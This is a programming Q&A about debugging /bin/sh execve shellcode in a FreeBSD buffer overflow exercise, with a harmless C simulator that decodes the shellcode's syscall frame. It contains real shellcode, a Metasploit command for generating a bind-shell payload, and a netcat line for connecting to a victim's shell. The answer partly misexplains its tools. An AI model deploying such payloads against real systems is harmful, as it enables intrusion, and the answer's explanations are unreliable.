Buffer Overflow - Program terminates after spawning a shell

I have been experimenting with buffer overflows on a FreeBSD system. As the first experiment I tried to get the exploited program to start another process (/bin/hostname in this case). That all worked fine: the program printed the hostname and then terminated. After that I tried to make the program spawn a shell (i.e., execute /bin/sh). I assumed that this could be done by simply exchanging the string representing the program to be called. When I try this, the exploited program simply quits; according to gdb it does successfully spawn a new process (/bin/sh). However, no shell is spawned. I then tried my first exploit again with the /bin/sh file moved to /bin/hostname; that still doesn't change anything. My question now is: what is different about executing /bin/sh compared to any other command?

For reference, for the shell spawning attempt I used the following shellcode:

char code[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68"   /* xor eax,eax ; push eax (NUL that ends the path) ; push "//sh" */
"\x68\x2f\x62\x69\x6e\x89\xe3\x50"                 /* push "/bin" ; mov ebx,esp (ebx -> "/bin//sh") ; push eax (NULL) */
"\x54\x53\xb0\x3b\x50\xcd\x80";                    /* push esp (argv) ; push ebx (path) ; mov al,59 (FreeBSD SYS_execve) ; push eax (dummy return address) ; int 0x80 */
user1419086 asked May 26 '12 14:05
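The posted shellcode replayed instruction by instruction. This is an added example, not code from the question or its answer. It assumes the FreeBSD i386 syscall convention the shellcode targets (syscall number in eax, a dummy return-address dword at [esp], arguments at [esp+4], [esp+8], [esp+12], number 59 = execve), and its "addresses" are offsets into a simulated buffer rather than real process addresses. It lets you check precisely which path, argv and envp the kernel is handed before debugging why the new process does not stay up.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not the question's own code: a tiny interpreter for exactly
 * the opcodes used in the posted shellcode. It replays the pushes on a
 * simulated stack and reports the frame that int 0x80 sees under the FreeBSD
 * i386 convention (assumed here): eax = syscall number, a dummy return-address
 * dword at [esp], then the arguments at [esp+4], [esp+8], [esp+12].
 * Addresses are offsets into `mem`, not real process addresses. */

#define MEM_SIZE 4096u           /* simulated memory; the stack grows down from its top */
#define FREEBSD_SYS_EXECVE 59u   /* SYS_execve in FreeBSD's i386 syscall table */

/* The shellcode from the question, copied verbatim. */
static const unsigned char posted_shellcode[] =
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68"
    "\x68\x2f\x62\x69\x6e\x89\xe3\x50"
    "\x54\x53\xb0\x3b\x50\xcd\x80";
#define POSTED_LEN (sizeof posted_shellcode - 1)   /* drop the literal's trailing NUL */

struct syscall_frame {
    uint32_t num;        /* eax at int 0x80 */
    uint32_t arg[3];     /* dwords at [esp+4], [esp+8], [esp+12] */
    char path[32];       /* NUL-terminated string at arg[0] (execve path) */
    unsigned argc;       /* non-NULL pointers in the vector at arg[1] (execve argv) */
    int envp_null;       /* 1 if arg[2] == 0 (execve envp) */
};

static uint32_t ld32(const unsigned char *m, uint32_t a) {
    return (uint32_t)m[a] | (uint32_t)m[a + 1] << 8 | (uint32_t)m[a + 2] << 16 | (uint32_t)m[a + 3] << 24;
}
static void st32(unsigned char *m, uint32_t a, uint32_t v) {
    m[a] = v & 0xff; m[a + 1] = (v >> 8) & 0xff; m[a + 2] = (v >> 16) & 0xff; m[a + 3] = v >> 24;
}

/* Execute `code` up to its first int 0x80 and fill in `f`.
 * Returns 1 on success, 0 if an unsupported opcode is hit or the code ends first. */
int replay_shellcode(const unsigned char *code, size_t len, struct syscall_frame *f)
{
    unsigned char mem[MEM_SIZE];
    uint32_t eax = 0xdeadbeef, ebx = 0xdeadbeef, esp = MEM_SIZE - 16; /* registers start as junk, like a real hijack */
    size_t ip = 0;

    memset(mem, 0xcc, sizeof mem);
    memset(f, 0, sizeof *f);

    while (ip < len) {
        unsigned char op = code[ip];
        if (op == 0x31 && ip + 1 < len && code[ip + 1] == 0xc0) { eax = 0; ip += 2; }                   /* xor eax,eax */
        else if (op == 0x50) { esp -= 4; st32(mem, esp, eax); ip += 1; }                                 /* push eax */
        else if (op == 0x53) { esp -= 4; st32(mem, esp, ebx); ip += 1; }                                 /* push ebx */
        else if (op == 0x54) { uint32_t old = esp; esp -= 4; st32(mem, esp, old); ip += 1; }             /* push esp (value before the push) */
        else if (op == 0x68 && ip + 4 < len) { esp -= 4; st32(mem, esp, ld32(code, (uint32_t)ip + 1)); ip += 5; } /* push imm32 */
        else if (op == 0x89 && ip + 1 < len && code[ip + 1] == 0xe3) { ebx = esp; ip += 2; }            /* mov ebx,esp */
        else if (op == 0xb0 && ip + 1 < len) { eax = (eax & 0xffffff00u) | code[ip + 1]; ip += 2; }     /* mov al,imm8 */
        else if (op == 0xcd && ip + 1 < len && code[ip + 1] == 0x80) {                                  /* int 0x80: decode the frame */
            f->num = eax;
            for (int i = 0; i < 3; i++)
                f->arg[i] = ld32(mem, esp + 4 + 4 * i);
            /* path: copy the string at arg[0] while it stays inside simulated memory */
            if (f->arg[0] < MEM_SIZE)
                for (unsigned i = 0; f->arg[0] + i < MEM_SIZE && i < sizeof f->path - 1 && mem[f->arg[0] + i]; i++)
                    f->path[i] = (char)mem[f->arg[0] + i];
            /* argv: count pointers until the NULL terminator */
            for (uint32_t a = f->arg[1]; a <= MEM_SIZE - 4 && ld32(mem, a) != 0; a += 4)
                f->argc++;
            f->envp_null = (f->arg[2] == 0);
            return 1;
        }
        else return 0;
    }
    return 0;
}

int main(void)
{
    struct syscall_frame f;
    if (!replay_shellcode(posted_shellcode, POSTED_LEN, &f)) {
        puts("hit an opcode this replayer does not model before int 0x80");
        return 1;
    }
    printf("syscall number : %u (%s)\n", (unsigned)f.num,
           f.num == FREEBSD_SYS_EXECVE ? "SYS_execve on FreeBSD i386" : "not execve");
    printf("path           : \"%s\"\n", f.path);
    printf("argv           : %u non-NULL entries before the terminator\n", f.argc);
    printf("envp           : %s\n", f.envp_null ? "NULL" : "non-NULL");
    return 0;
}
```

For the posted bytes the replayer reports syscall 59, path "/bin//sh", an argv vector whose first entry is already NULL (argc 0) and envp NULL; swap in the /bin/hostname string and it shows the frame of the first experiment the same way. The replayer deliberately models only the opcodes in this shellcode and returns 0 on anything else, so a truncated or altered payload is reported instead of silently mis-decoded.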


1 Answer

Hah, I see what you mean, but I believe you're making one fundamental mistake: you're invoking an interactive shell without binding it.

It's like calling an "ifconfig" command. If you want a single command executed, then your shellcode is perfect; however, if you want an interactive shell, you can't just run sh.

Simply running sh will cause a shell to be executed; it won't give you interactive control over the shell.


Solution: Use a shell code generator to make a reverse tcp shell or a bind shell and use that as the payload for your exploit.

If you're attempting to do this in Metasploit, then here's an example of the command you want.

msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -e x86/alpha_mixed -b '\x00' -t c
  • msfpayload is the name of the function; windows/shell_bind_tcp is the exploit path
  • LPORT is the port on which the remote victim machine will have the shell accessible
  • R is for raw output
  • Then we pipe that to msfencode, since we need it as C code to be executable, and it has to be compiled for that architecture
  • -e denotes the encoding type and architecture to support; the example here is for Win SP2
  • -b denotes the bytes you may not use in the shellcode, e.g. 00 is an end-of-string byte
  • -t is the output type, as C code.

Research a bit more and play around and you'll get it. Essentially it's much harder to get an interactive shell as compared to executing a static command.

Once done, you can use a program like netcat to connect and use the shell.

netcat.exe -nv <victim ip> <port where shell was bound to>

Hope this was the right solution.

Rohan Durve answered Sep 27 '22 23:09